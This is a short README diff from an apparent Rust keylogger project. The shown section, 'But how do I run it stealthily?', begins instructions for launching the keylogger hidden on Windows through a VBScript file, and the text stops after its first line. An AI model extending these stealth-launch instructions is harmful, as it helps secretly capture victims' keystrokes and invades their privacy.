SecretX33/rust-keylogger/README.md

 ### But how do I run it stealthily?

 It depends on the OS you want to execute it.
-In `Windows`, for example, make sure to first create the `.bat` file (as described above), then you can create a file called `run.vbs` with the following contents:
+In `Windows`, for example, create a file called `run.vbs` with the following contents:

 ```shell
 Set WshShell = CreateObject("WScript.Shell")